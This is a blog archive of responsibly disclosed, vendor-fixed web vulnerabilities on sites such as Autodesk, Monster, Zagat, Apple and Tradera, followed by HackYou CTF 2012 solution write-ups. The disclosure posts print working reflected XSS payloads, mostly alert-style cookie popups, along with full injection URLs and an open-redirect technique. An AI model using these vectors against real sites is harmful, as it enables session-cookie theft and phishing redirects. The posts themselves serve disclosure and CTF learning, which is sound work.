Monday, 14 January 2013

[ Resolved XSS on Autodesk.com ]


This is a reported "Reflected XSS" found on autodesk.com which i've reported it responsibly on 30/06/2012 and they have fixed it silently without replying.

Severity: Reflected XSS
Confidence: Certain
Host: http://usa.autodesk.com/
Path:  /adsk/servlet/u/gsearch/results?siteID=123112&catID=123155&id=2088334&qt=

Issue detail:
What i did was to enter the below XSS vector in the search field.
</script><script>alert(document.cookie)</script>

The final url is like below:
http://usa.autodesk.com/adsk/servlet/u/gsearch/results?siteID=123112&catID=123155&id=2088334&qt=</script><script>alert(document.cookie)</script>&x=0&y=0

This is the screenshot after i sent the payload.



Reported by: Jacob Soo
Vendor Notification: June 30, 2012
Resolution: Vendor silently fixed it
Posted by at No comments:
Labels: ,

[ Resolved Open Redirect on tradera.com ]


This is a reported "Open Redirect" bug found on tradera.com which i've reported it responsibly on 20/06/2012 and eBay have fixed it.

Severity: URL Redirection
Confidence: Certain
Host: http://zandra.tradera.com/
Path: /event/uoqru/tradera.content.ros/2381283037/click?url=http://www.tradera.com/spion-klocka-spy-watch-4gb-8mp-hd-kamera-vattentatt-30m-ny-auktion_342906_158165880

Issue detail:
The link was found on the main page of tradera.com
If i were to replace "click?url=http://www.tradera.com/spion-klocka-spy-watch-4gb-8mp-hd-kamera-vattentatt-30m-ny-auktion_342906_158165880" with "http://www.ebay.de" without the quotes

If attackers were to send this link to innocent victims, they might be redirected to another malicious website instead of ebay.de as shown in the exmple above.


Reported by: Jacob Soo
Vendor Notification: June 20, 2012
Resolution: October 27, 2012
Posted by at No comments:
Labels:

[ Resolved Self-XSS on Zagat.com ]


This is a reported "Self XSS" on zagat.com which i've reported it responsibly on 19/05/2012 and Google have fixed it within days.

Severity: Self-XSS
Confidence: Certain
Host:   http://www.zagat.com
Path:   GET /search/location

Issue detail:
The XSS vector in my examples is
"><img src=x onerror=prompt(1);>
I submitted it in between the value of "location field". In this case i took "annandale, va" for my example.
This input was echoed as
annan"><img src=x onerror=prompt(1);>+dale%2C+va
in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated how do i make use of a dynamically evaluated expression which allows me to introduce arbitrary JavaScript into the document.

Note that this technique is works on all the browsers i have installed currently.

This is the screenshot after i sent the payload.



Reported by: Jacob Soo
Vendor Notification: May 19, 2012
Resolution: May 24, 2012
Posted by at No comments:
Labels: ,

[ Resolved XSS on Monster.com ]



This is a reported "Reflected XSS" on monster.com which i've reported it responsibly on 28/06/2012 and monster.com have silently fixed it without replying back to me. Life is such.

Severity: Reflected XSS
Confidence: Certain
Host: http://jobsearch.monster.com/
Path: /search/

Issue detail:
What i did was to enter the below XSS vector in the search fields.
"><img src=x onerror=prompt(document.cookie);>

You will have something like the following:
http://jobsearch.monster.com/search/__22__3E__3Cimg-src__3Dx-onerror__3Dalert__28document.cookie__29__3E_5?q=__22__3E__3Cimg-src__3Dx-onerror__3Dalert__28document.cookie__29__3E&where=__22__3E__3Cimg-src__3Dx-onerror__3Dalert__28document.cookie__29__3E

This is the screenshot after i sent the payload.



Reported by: Jacob Soo
Vendor Notification: June 28, 2012
Resolution: July 2012

Posted by at No comments:
Labels: ,

[ Resolved XSS on Apple.com ]



This is a reported "Reflected XSS" on apple.com which i've reported it responsibly on 04/08/2012
I'll be blogging about some web bugs which i've reported and had been fixed. :D


Severity: Reflected XSS
Confidence: Certain
Host: http://www.apple.com/recycling/ipod-cell-phone/
Path: /

Issue detail:
What i did was to popup a alert using the payload below, which is just a base64 encoded of alert(document.cookie)
"<iframe src="data:text/html;base64,PGJvZHkgb25sb2FkPWFsZXJ0KGRvY3VtZW50LmNvb2tpZSk+"></iframe>



This is the screenshot before i send my payload.



This is the screenshot after i sent the payload.



Reported by: Jacob Soo
Vendor Notification: August 04, 2012
Resolution: September 26, 2012



Posted by at No comments:
Labels: ,

Friday, 19 October 2012

[ HackYou CTF 2012 : Secure&Safe - Halloween ]

For this particular challenge, I am given this image below.

It reminded me of an old challenge used in one of the Korean CTF where i just fill the Black colour with another colour. Immediately, i used MS Paint (yeah as i am a poor chap. :( ) and filled the Black area with White colour and i got back the following image.


Hmmm...what is the dots representing? After analysing for some time, my gut feel tells me that it's not morse code nor Braille. The 2 dots could represent 1 and 1 dot represent 0 like Binary.
But wait a minute, there are only 7 of it for each character? Well, it could be 7-bit ascii.


1100001 1101001 1101110 1110100 1011111 1100001
1100110 1110010 1100001 1101001 1100100 1011111 1101111 1100110 1011111 1101110
1101111 1011111 1100111 1101000 1101111 1110011 1110100 1110011

So i developed a Python script just to decode this.
import sys,os
'''
We are only interested in the following 7-bit ascii
1100001 1101001 1101110 1110100 1011111 1100001
1100110 1110010 1100001 1101001 1100100 1011111 1101111 1100110 1011111 1101110
1101111 1011111 1100111 1101000 1101111 1110011 1110100 1110011
'''
string = "" 
string = chr(int('1100001',2))
string += chr(int('1101001',2))
string += chr(int('1101110',2))
string += chr(int('1110100',2))
string += chr(int('1011111',2))
string += chr(int('1100001',2))

string += chr(int('1100110',2))
string += chr(int('1110010',2))
string += chr(int('1100001',2))
string += chr(int('1101001',2))
string += chr(int('1100100',2))
string += chr(int('1011111',2))
string += chr(int('1101111',2))
string += chr(int('1100110',2))
string += chr(int('1011111',2))
string += chr(int('1101110',2))

string += chr(int('1101111',2))
string += chr(int('1011111',2))
string += chr(int('1100111',2))
string += chr(int('1101000',2))
string += chr(int('1101111',2))
string += chr(int('1110011',2))
string += chr(int('1110100',2))
string += chr(int('1110011',2))
print("%s\n" % string)

The result from this Python script is "aint_afraid_of_no_ghosts" and that is the key to this challenge.

Cheers,
Jacob Soo
Posted by at No comments:
Labels: , ,

[ HackYou CTF 2012 : Secure&Safe - Perfect Concealment ]

I don't have the direct link to the .txt file but inside the .txt file you will see this.

The giant panda (Ailuropoda melanoleuca, meaning "black and white cat-foot") is a type of bear. It lives in bamboo forests in central China. The giant panda is an endangered animal. In November 2007, China had 239 giant pandas who lived in captivity. There are 27 giant pandas which live in zoos outside of China. The exact number of giant pandas in the wild is not known. Some sources say there are about 1,590, other sources give a number between 2,000 and 3,000. The number of giant pandas in the wild seems to be increasing.

Giant pandas are about 1.2–1.5 m long and about 75 cm high. They weigh between 75 and 160 kg. Giant pandas have white fur on their bodies and black fur on their legs and shoulders. They also have black ears and black patches around their eyes. Pandas can climb and swim well.

Giant pandas are born with pink skin, with black areas on the legs, ears, and eyes. They are usually born with a small amount of white fur. They get more fur when they are about nine months old.

Giant pandas live alone. Females have a territory which they deFend against other females. When female pandas are ready to mate, they give off a special scent and make a loud bLeating noise to tell the males that they are ready. Giant pandAs mate between the months of March and May which is the Summer months in China. If there are several males, they fight each other. The one who wins – the stronGest male, then mates with the female. In August or September, the female gIves birth to one or two babies. If she has two babies, she will only raise one baby, and the other baby dies, no-one really knows how the female panda chooSe between the two. Giant panda babies are very small, and weigh only 90–130 grams, which is about 1/900 of its mother's weight. The baby drinks milk until it is 8–9 months old. Young pandas live with their mothers until they are 18–24 months old. They become mature when they are 5–7 years old. They live around 20 years in the wild and up to 30 years in captivity (e.g. in zoos). Unlike other bears, pandas do not hibernate.

Today, the giant panda is seen as a symbol for China. It is also protected by the ChineSe government, and killing a panda is a crime. ThE giant panda is now under the threat of eXtinction, and it will die out if the forests of bamboo continue to disappear.

People outside of eastern Asia did not know about the giant panda until 1869. The first "Westerner" to see a live panda was a German zoologist in 1916. In 1936, Ruth Harkness became the first Westerner to bring a live giant panda out of China. It was a cub (babY panda) named Su-Lin. The cub was taken to live at the Brookfield Zoo in Chicago.

In the 1970s, China began showing giant pandaS in zoos in the UniTed States and Japan as a type of diplomacy. This happened until 1984, when China changEd how this was done. Starting in 1984, China would allow zoos to keep the giant pandas for 10 years, but the zoo would have to pay China up to $1,000,000 each year. Also, the zoo would have to aGree that any cubs born would belong to China.

Although their bodies are made to eat meat, giant pandas are mostly herbivOrous. Their main source of food is bamboo. Because pandas have the digestive system of carnivores and can not digest cellulose very well, they get little energy and protein from the bamboo they eat. Because they get very little nutrition from bamboo, they must eat a lot. Pandas commonly eat 20 to 30 pounds of bamboo a day to get the nutrition they need. Although there are more than 200 different varieties of bamboo the Panda will only eat 20 varieties. Pandas sometimes run out of food, as a tyPe of bamboo flowers, die, and regrow again at the same time.

As of 2008, the giant bear is an endangered animal. The main problem they have is habitat loss. Habitat loss is when the places they live in are ruined. Humans often ruin the places where pandas live, such as for the construction of buildings. Pandas cAn also lose their habitat because of pollution. Pollution means that less bamboo grows, or that bamboo stops growing completely in a certain place. Giant pandas also have a low birth rate, which makes the problem worse.

TraditioNal Chinese stories about the giant pandas say that the animal can be very powerful. Some people believe that sleeping on a panda skin can protect them from ghost and predict their future. These tales are one of the reasons why people would spend lots of money for the skin and fur of this precious animal.

In former times, the panDas were also hunted. The Western people who came to China were soon unable to hunt the pandas, because of different wars. Local people continued though. PandAs were mainly hunted for their fur. Today, hunting pandas is not allowed.

In 1963, China set up a nature reserve for pandas, the Wolong National Nature Reserve. This was the firSt, other nature reserves followed. China did this to fight the number of pandas going down. In 2006, there were 40 panda reserves, compared to 13, two decades ago.
After looking through for a while, i can see that some words had Capital letters in between a word.
Probably those "Capital letters" are what we are looking for.
Using the python script that i've developed, we can see what does the special "Capital letters" form.

import re
# Read the file into a string
text = open('stg100.txt', 'r').read()
key = re.findall('\w\w*([A-Z])\w*', text)
print("%s\n" % key)
The output from my script is:
['F', 'L', 'A', 'G', 'I', 'S', 'S', 'E', 'X', 'Y', 'S', 'T', 'E', 'G', 'O', 'P', 'A', 'N', 'D', 'A', 'S']


The key to this challenge is "SEXYSTEGOPANDAS"

Cheers,
Jacob Soo
Posted by at No comments:
Labels: , ,

[ HackYou CTF 2012 : Wikitap - Oscaderp Forensic ]

I'm only given the following as hint.

What's the md5 of the file being transferred?

Downloading the link that was given to me and doing a check, it's another PCAP file.
Ok, let's load it up with Wireshark and analyse it.
After analysing it, it seems like a FTP session.
In Wireshark, there is a filter, "ftp-data" for all data that is being transferred.
So let's use that filter and we will be able to get something like the image shown below.

The important FTP data packets are the last 3 in the image which is for tcp_serv.beam.
So if we do a "Right-Click"->"Follow TCP Stream" to retrieve the file.
Then do a "Save As" to save the file. Now just use m5sum or any of your favourite md5 tool to check the md5 of the file which we just saved.
We will get "77f92edb199815b17e2ff8da36e200df" which is the key to this challenge. :P

Cheers,
Jacob Soo

Posted by at No comments:
Labels: , , ,

[ HackYou CTF 2012 : Wikitap - EpikArc ]


Initially, i thought this could be a more forensics type of challenges. It turned out to be more of Network Forensics.

Mister You is willing to hire someone who can repeat his investigation.
Arc starts from here
The above link will give you a PCAP file.
Find the secret link in this conversation.

After analysing the the .pcap file for a while using Wireshark, it seems that the conversation is via HTTP POST.
So what i did was use the in-built filter in Wireshark to search for all the conversation in the .pcap file like the image shown below.
Then we find the following message.


As we can see the key to this particular challenge is "tinyurl.com/8pdox5a"

P.S: Going to the above link will give us the file for the Mystery Challenge. :P

Cheers,
Jacob Soo
Posted by at No comments:
Labels: , , ,

Thursday, 18 October 2012

[ HackYou CTF 2012 : Binary - Open-Source ]

Next up is Open-Source.
All i've got is an Open Source C code that was given to me here.
The source code looks like this.
#include <stdio.h>
#include <string.h>

int main(int argc, char *argv[]) {
    if (argc != 4) {
    printf("what?\n");
    exit(1);
    }

    unsigned int first = atoi(argv[1]);
    if (first != 0xcafe) {
    printf("you are wrong, sorry.\n");
    exit(2);
    }

    unsigned int second = atoi(argv[2]);
    if (second % 5 == 3 || second % 17 != 8) {
    printf("ha, you won't get it!\n");
    exit(3);
    }

    if (strcmp("h4cky0u", argv[3])) {
    printf("so close, dude!\n");
    exit(4);
    }

    printf("Brr wrrr grr\n");

    unsigned int hash = first * 31337 + (second % 17) * 11 + strlen(argv[3]) - 1615810207;

    printf("Get your key: ");
    printf("%x\n", hash);
    return 0;
}

Well, looking at the source code. We can deduce a few things.
first == 0xcafe == 51966
second == 25
argv[3] must be different from h4cky0u but i believe the strlen should be the same.

Finally, hash should be
hash = 51966 * 31337 + (25%17)*11+7 -1615810207
hash will eventually be 1628458637 - 1615810207 -> 12648430

As the results is printed in hexadecimal, the key is c0ffee

 Cheers,
Jacob Soo
Posted by at No comments:
Labels: , ,
Subscribe to: Posts (Atom)